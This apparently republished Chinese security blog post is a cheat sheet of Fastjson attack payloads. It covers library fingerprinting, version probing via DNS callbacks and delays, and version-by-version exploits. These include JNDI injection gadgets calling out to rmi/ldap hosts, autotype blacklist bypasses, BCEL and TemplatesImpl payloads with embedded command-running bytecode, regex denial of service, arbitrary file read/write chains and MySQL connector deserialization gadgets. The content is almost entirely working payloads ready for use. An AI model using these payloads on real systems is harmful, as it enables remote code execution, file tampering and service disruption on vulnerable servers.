Fastjson姿势技巧集合

admin 2024年8月12日21:00:31评论18 views字数 18172阅读60分34秒阅读模式

点击蓝字,关注我们

Fastjson姿势技巧集合

一、判断是否用了fastjson

鉴别fastjson

DNSLOG

{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog.com"}}
{{"@type":"java.net.URL","val":"<http://dnslog.com>"}:"a"}

根据解析变化

{"a":new a(1),"b":x'11',/*\*\/"c":Set[{}{}],"d":"\u0000\x00"} {"ext":"blue","name":{"$ref":"$.ext"}}

根据响应状态

{"@type":"whatever"}

鉴别org.json

特殊字符

{a:'\r'}

鉴别gson

浮点类型精度丢失

{a:1.111111111111111111111111111}

注释符

#\r\n{a:1}

鉴别jackson

浮点类型精度丢失

{a:1.111111111111111111111111111}

注释符

{a:1}/*#aaaa

不支持单引号作为界定符

{'a':'b'}

多余的类成员

{"name":"a","age":18}

如果目标回显详细报错信息,稍微破坏一下json结构,比如多一个{,比如简简单单把{}变成a。就可以看出来到底是不是jackson。

如果目标不回显详细报错信息,而是只有一个500或者error,那么jackson不允许存在不相关的键值,fastjson允许这个特性就可以派上用场了。

比如原json如下。

{"pageNumber":1,"pageSize":1}

加上一个不相关的键值

{"pageNumber":1,"pageSize":1,"test":1}

jackson就会报错,fastjson则不会,而是和之前一模一样。

二、版本探测

无报错信息探测

【不报错】1.2.83/1.2.24 【报错】1.2.25-1.2.80

{"zero":{"@type":"java.lang.Exception","@type":"org.XxException"}}

【不报错】1.2.24-1.2.68 【报错】1.2.70-1.2.83

{"zero":{"@type":"java.lang.AutoCloseable","@type":"java.io.ByteArrayOutputStream"}}

【不报错】1.2.24-1.2.47 【报错】1.2.48-1.2.83

{
    "a": {
        "@type""java.lang.Class",
        "val""com.sun.rowset.JdbcRowSetImpl"
    },
    "b": {
        "@type""com.sun.rowset.JdbcRowSetImpl"
    }
}

【不报错】1.2.24 【报错】1.2.25-1.2.83

{"zero": {"@type""com.sun.rowset.JdbcRowSetImpl"}}

延迟探测

原理同ssrf漏洞。请求本机已开放端口不延时,请求不开放的端口则延时。

fastjson 1.1.15-1.2.24

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/badClassName""autoCommit":true}

通用payload,可用于parseObject的场景

{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:8088/badClassName""autoCommit":true}}""}

fastjson 1.2.9-1.2.47

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://localhost:808/badNameClass",
        "autoCommit":true
    }
}

通用payload,可用于parseObject的场景

{"@type":"com.alibaba.fastjson.JSONObject",{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://localhost:8088/badNameClass",
        "autoCommit":true
    }
}}""}

Fastjson 1.2.36 - 1.2.62

利用正则dos洞,进行探测。逐步加a,直到延迟为止

{
    "regex":{
        "$ref":"$[blue rlike '^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$']"
    },
    "blue":"aaaaaaaaaaaa!"
}

参考https://mp.weixin.qq.com/s/5mO1L5o8j_m6RYM6nO-pAA

异常回显

异常回显 fastjson 精确版本号

{
  "@type""java.lang.AutoCloseable"

dns探测

主要是利用各个类被加入黑名单的方式进行判断,但此方法准确性不高。

原理重点关注MiscCodec处理时会去nwe URL,然后通过后面的map#put触发计算key的hash。学习urldns链容易理解。

fastjson <1.2.43

{"@type":"java.net.URL","val":"<http://dnslog>"}
{{"@type":"java.net.URL","val":"<http://dnslog>"}:"x"}

fastjson <1.2.48

{"@type":"java.net.InetAddress","val":"dnslog"}

fastjson <1.2.68

{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"<http://dnslog>"}}""}
Set[{"@type":"java.net.URL","val":"<http://dnslog>"}]
Set[{"@type":"java.net.URL","val":"<http://dnslog>"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
{{"@type":"java.net.URL","val":"<http://dnslog>"}:0

精确探索autoType是否开启

[{"@type":"java.net.CookiePolicy"},{"@type":"java.net.Inet4Address","val":"ydk3cz.dnslog.cn"}]

关键rce版本探测

1.2.24 版本,用上面的延时探测即可

1.2.47 版本

[
  {
    "@type""java.lang.Class",
    "val""java.io.ByteArrayOutputStream"
  },
  {
    "@type""java.io.ByteArrayOutputStream"
  },
  {
    "@type""java.net.InetSocketAddress"
  {
    "address":,
    "val""dnslog"
  }
}
]

1.2.68版本

[
  {
    "@type""java.lang.AutoCloseable",
    "@type""java.io.ByteArrayOutputStream"
  },
  {
    "@type""java.io.ByteArrayOutputStream"
  },
  {
    "@type""java.net.InetSocketAddress"
  {
    "address":,
    "val""dnslog"
  }
}
]

1.2.80 版本探测 如果收到了两个 dns 请求,则证明使用了 1.2.83 版本 如果收到了一个 dns 请求,则证明使用了 1.2.80 版本

[
  {
    "@type""java.lang.Exception",
    "@type""com.alibaba.fastjson.JSONException",
    "x": {
      "@type""java.net.InetSocketAddress"
  {
    "address":,
    "val""first.dnslog.cn"
  }
}
},
  {
    "@type""java.lang.Exception",
    "@type""com.alibaba.fastjson.JSONException",
    "message": {
      "@type""java.net.InetSocketAddress"
  {
    "address":,
    "val""second.dnslog.cn"
  }
}
}
]

三、各版本利用

除了考虑Fastjson版本,还得考虑JDK版本,中间件版本,第三方依赖版本。

JDK版本对于JDNI注入的限制,基于RMI利用的JDK版本<=6u141、7u131、8u121,基于LDAP利用的JDK版本<=6u211、7u201、8u191。(更高版本也有绕过)

更高版本绕过可用https://github.com/veracode-research/rogue-jndi

  1. jndi
    1. JdbcRowSetImpl
    2. C3p0#JndiRefForwardingDataSource
    3. JndiDataSourceFactory
  2. bcel
    1. tomcat#dbcp
    2. ibatis
  3. TemplatesImpl

Fastjson 1.2.22-1.2.24

JdbcRowSetImpl

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/badClassName""autoCommit":true}

c3p0#JndiRefForwardingDataSource

JdbcRowSetImpl无法成功可以一试

{"@type":"com.mchange.v2.c3p0.JndiRefForwardingDataSource","jndiName":"rmi://127.0.0.1:1099/badClassName""loginTimeout":0}

shiro#JndiObjectFactory

{"@type":"org.apache.shiro.jndi.JndiObjectFactory""resourceName":"rmi://127.0.0.1:9050/exploit"}

shiro#JndiRealmFactory

{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory""jndiNames":"rmi://127.0.0.1:9050/exploit"}

1.2.33<=fastjson<=12.36

{
    "name":
    {
        "@type" : "java.lang.Class",
        "val"   : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"
    },
    "x" : {
        "name": {
            "@type" : "java.lang.Class",
            "val"   : "com.sun.org.apache.bcel.internal.util.ClassLoader"
        },
        {
            "@type":"com.alibaba.fastjson.JSONObject",
            "c": {
                "@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
                "driverClassLoader": {
                    "@type" : "com.sun.org.apache.bcel.internal.util.ClassLoader"
                },
                "driverClassName":"$$BCEL..."
            }
        } : "ddd"
    }
}

1.2.37<=fastjson<=1.2.47

{
    "name":
    {
        "@type" : "java.lang.Class",
        "val"   : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"
    },
    "x" : {
        "name": {
            "@type" : "java.lang.Class",
            "val"   : "com.sun.org.apache.bcel.internal.util.ClassLoader"
        },
        "y": {
            "@type":"com.alibaba.fastjson.JSONObject",
            "c": {
                "@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
                "driverClassLoader": {
                    "@type" : "com.sun.org.apache.bcel.internal.util.ClassLoader"
                },
                "driverClassName":"$$BCEL$..",

                     "$ref""$.x.y.c.connection"
            }
        }
    }
}

其他

{
  "@type""org.apache.ibatis.datasource.unpooled.UnpooledDataSource",
  "key": {
    "@type""java.lang.Class",
    "val""com.sun.org.apache.bcel.internal.util.ClassLoader"
  },
  "driverClassLoader": {
    "@type""com.sun.org.apache.bcel.internal.util.ClassLoader"
  },
  "driver""$$BCEL$$xxxxxxx"
}

TemplatesImpl

利用条件苛刻,可用于解决不出网利用。

需要调用parseObject()方法时,加入Feature.SupportNonPublicField参数。

_bytecodes要进行base64编码

{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAADQAJgoABwAXCgAYABkIABoKABgAGwcAHAoABQAXBwAdAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACkV4Y2VwdGlvbnMHAB4BAAl0cmFuc2Zvcm0BAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWBwAfAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYHACABAApTb3VyY2VGaWxlAQALVEVNUE9DLmphdmEMAAgACQcAIQwAIgAjAQASb3BlbiAtYSBDYWxjdWxhdG9yDAAkACUBAAZURU1QT0MBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9pby9JT0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAHAAAAAAAEAAEACAAJAAIACgAAAC4AAgABAAAADiq3AAG4AAISA7YABFexAAAAAQALAAAADgADAAAACwAEAAwADQANAAwAAAAEAAEADQABAA4ADwABAAoAAAAZAAAABAAAAAGxAAAAAQALAAAABgABAAAAEQABAA4AEAACAAoAAAAZAAAAAwAAAAGxAAAAAQALAAAABgABAAAAFgAMAAAABAABABEACQASABMAAgAKAAAAJQACAAIAAAAJuwAFWbcABkyxAAAAAQALAAAACgACAAAAGQAIABoADAAAAAQAAQAUAAEAFQAAAAIAFg=="],"_name":"a.b","_tfactory":{ },"_outputProperties":{ },"_version":"1.0","allowedProtocols":"all"}

Fastjson 1.2.25-1.2.41

1.2.25后将TypeUtils.loadClass替换为checkAutoType()函数,增加了黑名单和白名单。

把autoTypeSupport默认为False。

当autoTypeSupport为False时,先黑名单过滤,再白名单过滤,若白名单匹配上则直接加载该类,否则报错。

当autoTypeSupport为True时,先白名单过滤,匹配成功即可加载该类,否则再黑名单过滤。

1.2.25黑名单

bsh
com.mchange
com.sun.
java.lang.Thread
java.net.Socket
java.rmi
javax.xml
org.apache.bcel
org.apache.commons.beanutils
org.apache.commons.collections.Transformer
org.apache.commons.collections.functors
org.apache.commons.collections4.comparators
org.apache.commons.fileupload
org.apache.myfaces.context.servlet
org.apache.tomcat
org.apache.wicket.util
org.codehaus.groovy.runtime
org.hibernate
org.jboss
org.mozilla.javascript
org.python.core
org.springframework

exp

条件需要开启autotype

类名前面加了一个L,后面加一个;可以绕过黑名单

{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://localhost:1389/badNameClass""autoCommit":true}

Fastjson 1.2.25-1.2.42

从1.2.42版本开始,把之前的明文黑名单,改为hash黑名单。

如下大佬整理的

https://github.com/LeadroyaL/fastjson-blacklist

exp

条件需要开启autotype

双写绕过

{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://localhost:1389/badNameClass""autoCommit":true}

Fastjson 1.2.25-1.2.43

exp

条件需要开启autotype

加[{绕过

{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://localhost:1389/badNameClass""autoCommit":true}

Fastjson 1.2.25-1.2.45

条件需要开启autotype

45把之前问题修了,但是可以借助第三方组件绕过。

需要mybatis,且版本需为3.x.x系列<3.5.0的版本。

{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1389/badNameClass"}}

Fastjson1.2.25-1.2.47通杀

借助缓存进行通杀,缓存在1.2.48被改为默认关闭

漏洞原理是通过java.lang.Class,将JdbcRowSetImpl类加载到Map中缓存,从而绕过AutoType的检测

这里有两大版本范围:

  • 1.2.25-1.2.32版本:未开启AutoTypeSupport时能成功利用,开启AutoTypeSupport不能利用
  • 1.2.33-1.2.47版本:无论是否开启AutoTypeSupport,都能成功利用

poc:

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://localhost:1389/badNameClass",
        "autoCommit":true
    }
}

Fastjson 1.2.36 - 1.2.62

正则表达式拒绝服务漏洞

{
    "regex":{
        "$ref":"$[\blue = /\^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$/]"
    },
    "blue":"aaaaaaaaaaaaaaaaaaaaaaaaaaaa!"
}
{
    "regex":{
        "$ref":"$[blue rlike '^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$']"
    },
    "blue":"aaaaaaaaaaaaaaaaaaaaaaaaaaaa!"
}

Fastjson1.2.5 <= 1.2.59

需要开启AutoType

{"@type":"com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://localhost:1389/Exploit"}
{"@type":"com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://localhost:1389/Exploit"}

Fastjson1.2.5 <= 1.2.60

需开启 autoType:

{"@type":"oracle.jdbc.connector.OracleManagedConnectionFactory","xaDataSourceName":"rmi://10.10.20.166:1099/ExportObject"}

{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"ldap://10.10.20.166:1389/ExportObject"}

Fastjson1.2.5 <= 1.2.61

{"@type":"org.apache.commons.proxy.provider.remoting.SessionBeanProvider","jndiName":"ldap://localhost:1389/Exploit","Object":"a"}

Fastjson <1.2.62

  • 需要开启AutoType;
  • Fastjson <= 1.2.62;
  • JNDI注入利用所受的JDK版本限制;
  • 目标服务端需要存在xbean-reflect包;
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1098/exploit"}
{"@type":"org.apache.cocoon.components.slide.impl.JMSContentInterceptor""parameters": {"@type":"java.util.Hashtable","java.naming.factory.initial":"com.sun.jndi.rmi.registry.RegistryContextFactory","topic-factory":"ldap://localhost:1389/Exploit"}, "namespace":""}

fastjson<=1.2.66

前提条件

  • 开启AutoType;
  • Fastjson <= 1.2.66;
  • JNDI注入利用所受的JDK版本限制;
  • org.apache.shiro.jndi.JndiObjectFactory类需要shiro-core包;
  • br.com.anteros.dbcp.AnterosDBCPConfig类需要Anteros-Core和Anteros-DBCP包;
  • com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig类需要ibatis-sqlmap和jta包;
{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}
{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory""jndiNames":["ldap://localhost:1389/Exploit"], "Realms":[""]}

{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}

{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"ldap://localhost:1389/Exploit"}

{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/Calc"}

{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://192.168.80.1:1399/Calc"}}

适用于jdk11以上版本的写文件的payload:

{
    "@type""java.lang.AutoCloseable",
    "@type""sun.rmi.server.MarshalOutputStream",
    "out": {
        "@type""java.util.zip.InflaterOutputStream",
        "out": {
           "@type""java.io.FileOutputStream",
           "file""/tmp/asdasd",
           "append"true
        },
        "infl": {
           "input": {
               "array""eJxLLE5JTCkGAAh5AnE=",
               "limit": 14
           }
        },
        "bufLen""100"
    },
    "protocolVersion": 1
}

fastjson<=1.2.67

前提条件

  • 开启AutoType;
  • Fastjson <= 1.2.67;
  • JNDI注入利用所受的JDK版本限制;
  • org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup类需要ignite-core、ignite-jta和jta依赖;
  • org.apache.shiro.jndi.JndiObjectFactory类需要shiro-core和slf4j-api依赖;
{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup""jndiNames":["ldap://localhost:1389/Exploit"], "tm": {"$ref":"$.tm"}}

{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://localhost:1389/Exploit","instance":{"$ref":"$.instance"}}

fastjson<=1.2.68

  • Fastjson <= 1.2.68;
  • 利用类必须是expectClass类的子类或实现类,并且不在黑名单中;
{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://localhost:1389/Exploit"}
{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://localhost:1389/Exploit"}
{"@type":"com.caucho.config.types.ResourceRef","lookupName""ldap://localhost:1389/Exploit""value": {"$ref":"$.value"}}

无需开启AutoType,直接成功绕过CheckAutoType()的检测从而触发执行:

{"@type":"java.lang.AutoCloseable","@type":"vul.VulAutoCloseable","cmd":"calc"}

读文件

{"@type":"java.lang.AutoCloseable""@type":"org.eclipse.core.internal.localstore.SafeFileOutputStream""tempPath":"C:/Windows/win.ini""targetPath":"D:/wamp64/www/win.txt"}

写文件

{
  "@type""java.lang.AutoCloseable",
  "@type""java.io.FileOutputStream",
  "file""/tmp/nonexist",
  "append""false"
}
{
  "@type""java.lang.AutoCloseable",
  "@type""java.io.FileWriter",
  "file""/tmp/nonexist",
  "append""false"
}

写文件

{
    "stream": {
        "@type""java.lang.AutoCloseable",
        "@type""org.eclipse.core.internal.localstore.SafeFileOutputStream",
        "targetPath""D:/wamp64/www/hacked.txt",
        "tempPath""D:/wamp64/www/test.txt"
    },
    "writer": {
        "@type""java.lang.AutoCloseable",
        "@type""com.esotericsoftware.kryo.io.Output",
        "buffer""cHduZWQ=",
        "outputStream": {
            "$ref""$.stream"
        },
        "position": 5
    },
    "close": {
        "@type""java.lang.AutoCloseable",
        "@type""com.sleepycat.bind.serial.SerialOutput",
        "out": {
            "$ref""$.writer"
        }
    }
}

写文件

{
    'stream':
    {
        '@type':"java.lang.AutoCloseable",
        '@type':'java.io.FileOutputStream',
        'file':'/tmp/nonexist',
        'append':false
    },
    'writer':
    {
        '@type':"java.lang.AutoCloseable",
        '@type':'org.apache.solr.common.util.FastOutputStream',
        'tempBuffer':'SSBqdXN0IHdhbnQgdG8gcHJvdmUgdGhhdCBJIGNhbiBkbyBpdC4=',
        'sink':
        {
            '$ref':'$.stream'
        },
        'start':38
    },
    'close':
    {
        '@type':"java.lang.AutoCloseable",
        '@type':'org.iq80.snappy.SnappyOutputStream',
        'out':
        {
            '$ref':'$.writer'
        }
    }
}

适用于jdk8/10的

{
  "@type""java.lang.AutoCloseable",
  "@type""sun.rmi.server.MarshalOutputStream",
  "out": {
    "@type""java.util.zip.InflaterOutputStream",
    "out": {
      "@type""java.io.FileOutputStream",
      "file""dst",
      "append""false"
    },
    "infl": {
      "input""eJwL8nUyNDJSyCxWyEgtSgUAHKUENw=="
    },
    "bufLen": 1048576
  },
  "protocolVersion": 1
}

jdk 8

  • position写入的长度,必须和base64编码前的长度一致。
{
    "stream": {
        "@type""java.lang.AutoCloseable",
        "@type""org.eclipse.core.internal.localstore.SafeFileOutputStream",
        "targetPath""f:/pwn.txt",
        "tempPath"""
    },
    "writer": {
        "@type""java.lang.AutoCloseable",
        "@type""com.esotericsoftware.kryo.io.Output",
        "buffer""YjF1M3I=",
        "outputStream": {
            "$ref""$.stream"
        },
        "position": 5
    },
    "close": {
        "@type""java.lang.AutoCloseable",
        "@type""com.sleepycat.bind.serial.SerialOutput",
        "out": {
            "$ref""$.writer"
        }
    }
}
Mysqlconnector 5.1.x
{"@type":"java.lang.AutoCloseable","@type":"com.mysql.jdbc.JDBC4Connection","hostToConnectTo":"mysql.host","portToConnectTo":3306,"info":{"user":”user","password":"pass","statementInterceptors":"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor","autoDeserialize":"true","NUM_HOSTS": "1"},"databaseToConnectTo":"dbname","url":""}

Mysqlconnector 6.0.2 or 6.0.3
{"
@type": "java.lang.AutoCloseable","@type": "com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection","proxy":{"connectionString":{"url": "jdbc:mysql://localhost:3306/foo?allowLoadLocalInfile=true"}}}

Mysqlconnector 6.x or < 8.0.20
{"
@type":"java.lang.AutoCloseable","@type":"com.mysql.cj.jdbc.ha.ReplicationMySQLConnection","proxy":{"@type":"com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy","connectionUrl":{"@type":"com.mysql.cj.conf.url.ReplicationConnectionUrl", "masters": [{"host":"mysql.host"}], "slaves":[], "properties":{"host":"mysql.host","user":"user","dbname":"dbname","password":"pass","queryInterceptors":"com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor","autoDeserialize":"true"}}}}
点点关注不迷路~

原文始发于微信公众号(TimeAxis Sec):Fastjson姿势技巧集合

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月12日21:00:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Fastjson姿势技巧集合http://cn-sec.com/archives/3056926.html

发表评论

匿名网友 填写信息